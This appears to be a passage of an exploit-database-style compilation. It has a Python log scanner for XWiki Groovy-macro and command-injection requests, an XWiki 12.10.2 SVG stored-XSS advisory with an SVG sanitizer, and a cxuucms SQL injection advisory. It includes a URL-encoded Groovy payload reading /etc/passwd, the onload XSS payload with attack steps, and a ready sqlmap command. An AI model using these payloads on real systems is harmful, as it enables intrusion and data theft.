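     lambda p: p.endswith("/bin/get/Main/SolrSearch"), "text", _is_wiki_macro),
]

def parse_line(line):
    """Split one access-log line into the fields the rules need; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": target.path,
        "params": parse_qs(target.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }

def match_rules(req):
    """Yield one finding per (rule, parameter value) the request matches."""
    for name, path_ok, param, value_ok in RULES:
        if not path_ok(req["path"]):
            continue
        for value in req["params"].get(param, []):
            if value_ok(value):
                yield {
                    "rule": name, "ip": req["ip"], "method": req["method"],
                    "status": req["status"], "value": value,
                    # A 2xx means the endpoint handled the request, so the
                    # command or macro very likely ran; 4xx/5xx hits are still
                    # worth reviewing as probing.
                    "likely_executed": 200 <= req["status"] < 300,
                }

def scan(lines):
    """Run every rule over every line and return the findings in log order."""
    findings = []
    for line in lines:
        req = parse_line(line)
        if req:
            findings.extend(match_rules(req))
    return findings

# Constructed sample log (made-up addresses and timestamps); the SolrSearch
# query string is the one from the PoC above.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2019:10:00:01 +0100] "GET /pages/systemcall.php?command=id HTTP/1.1" 200 512
10.0.0.5 - - [06/Dec/2019:10:00:02 +0100] "GET /pages/index.php HTTP/1.1" 200 2048
192.0.2.10 - - [06/Apr/2025:12:00:00 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 1400
192.0.2.10 - - [06/Apr/2025:12:00:05 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=sailing+club HTTP/1.1" 200 900
198.51.100.7 - - [23/Mar/2025:09:00:00 +0000] "POST /xwiki/bin/view/Admin/RunShellCommand?command=echo%20test HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['rule']:34} {f['ip']:13} {f['method']} {f['status']} {f['value']!r}")
```

The benign SolrSearch query in the sample is not flagged because the rule inspects the decoded `text` value for macro openers rather than matching the path alone.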
            
# Exploit Title: Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)
# Date: 17-01-2021
# Exploit Author: Karan Keswani
# Vendor Homepage: https://www.xwiki.org/xwiki/bin/view/Main/WebHome
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: Xwiki CMS- 12.10.2
# Tested on: Windows 10

# Description: XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.

# Additional Information:
Well, I found this vulnerability in XWiki-based websites, but they did not respond, so I installed the latest version of XWiki CMS, hosted it on localhost with the help of WAMP, and then exploited the vulnerability.

# Attack Vector:
1) Create 2 accounts: 1) Victim & 2) Attacker
2) Log in with the victim account; there is an option to create a new dashboard, and a page asks for a title and type. (Type of Dashboard: I created a simple page.)
3) Now save and view the page.
4) Now log in with the attacker account, then search for and open the dashboard created by the victim.
5) When you open the dashboard there is a comment section. Go to the comment section and add a comment; there is an upload functionality.
6) I first tried to upload a sample SVG file to check that the .svg format is allowed.
7) I then created a text file with the XSS payload and saved it in .svg format.
8) Upload your .svg file, click "Send it to the server" and click OK (your comment will be added).
9) Now open that comment with the victim account and click on "view image"; you'll see the XSS pop-up.

XSS Payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="alert('xss')" xmlns="http://www.w3.org/2000/svg">
</svg>
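An upload-side check for the SVG vector above, as an added example that is not part of the advisory: it parses the file and rejects event-handler attributes (the `onload` used here), script-bearing elements and `javascript:`/`data:` URLs. It uses the standard-library parser for self-containment; in production, parse with defusedxml instead so entity-expansion attacks are covered too.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that can execute script or embed a foreign document inside an SVG.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# URL schemes that turn a link or reference into executable content
# (data: is included because an inline document can itself carry script).
FORBIDDEN_SCHEMES = {"javascript", "vbscript", "data"}

def _local(qname):
    """Strip the ElementTree '{namespace}' prefix: '{uri}svg' -> 'svg'."""
    return qname.rsplit("}", 1)[-1]

def _scheme(url):
    """Scheme of a URL after removing whitespace that browsers ignore."""
    compact = "".join(url.split()).lower()
    return compact.split(":", 1)[0] if ":" in compact else ""

def find_active_content(svg_bytes):
    """Return the reasons an uploaded SVG must be rejected; [] means none found."""
    reasons = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        reasons.append("root element is not an SVG-namespaced <svg>")
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in FORBIDDEN_TAGS:
            reasons.append(f"forbidden element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                # The advisory's payload is exactly this: <svg onload="alert('xss')">
                reasons.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href" and _scheme(value) in FORBIDDEN_SCHEMES:
                reasons.append(f"{_scheme(value)}: URL in href on <{tag}>")
    return reasons

def is_safe_svg(svg_bytes):
    """True only when no script-capable construct was found."""
    return not find_active_content(svg_bytes)

# Samples: PAYLOAD_SVG is the advisory's payload; the other two are constructed.
PAYLOAD_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="alert('xss')" xmlns="http://www.w3.org/2000/svg">
</svg>"""
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>/* constructed */</script></svg>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for label, doc in (("payload", PAYLOAD_SVG), ("script", SCRIPT_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", find_active_content(doc) or "accepted")
```

Even with a filter in place, serve user uploads from a separate origin or with `Content-Disposition: attachment`, so a construct the filter misses cannot run in the application's origin.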
            
# Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php. For details, please refer to:
https://github.com/cbkhwx/cxuucmsv3/issues/1

Verify with sqlmap:
 sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname